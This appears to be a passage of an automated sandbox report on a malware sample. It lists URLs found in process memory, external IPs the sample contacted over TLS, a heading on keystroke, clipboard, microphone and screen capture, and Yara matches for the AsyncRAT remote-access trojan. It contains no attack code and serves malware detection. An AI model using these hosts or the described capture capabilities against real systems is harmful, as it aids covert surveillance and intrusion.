Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000E.00000000.1447862980.0000000009730000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/bat
Source: explorer.exe, 0000000E.00000000.1449509463.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com576
Source: lm.exe, 00000026.00000003.2710189734.0000000003138000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64
Source: BitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: BitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: lm.exe, 00000026.00000003.2710189734.0000000003138000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr
Source: lm.exe, 00000026.00000003.2693429073.000000000357C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
Source: lm.exe, 00000026.00000003.2693429073.000000000357C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
Source: BitLockerToGo.exe, 0000001F.00000003.2407694524.0000000005563000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2693429073.000000000357C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: lm.exe, 00000026.00000003.2693429073.000000000357C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: BitLockerToGo.exe, 0000001F.00000003.2407694524.0000000005563000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2693429073.000000000357C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/health/wellness/7-secrets-to-a-happy-old-age-backed-by-science/ss-AA1hwpvW
Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/companies/legacy-park-auction-canceled-liquidation-proposed-here-s-w
Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-years
Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/one-dead-several-wounded-after-drive-by-shootings-in-south-la/a
Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/opinion/decline-of-decorum-21-essential-manners-today-s-parents-fail-
Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/california-workers-will-get-five-sick-days-instead-of-three-
Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/pastor-of-atlanta-based-megachurch-faces-backlash-after-controv
Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact-
Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: SciTE.exe.5.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.5.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten
Source: 753F.exe.14.dr	String found in binary or memory: https://www.ssl.com/repository0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443

Source: unknown	HTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.10:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.84:443 -> 192.168.2.10:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.10:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.10:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49800 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49808 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49835 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49854 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 37.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.vm.exe.28c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.vm.exe.28c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
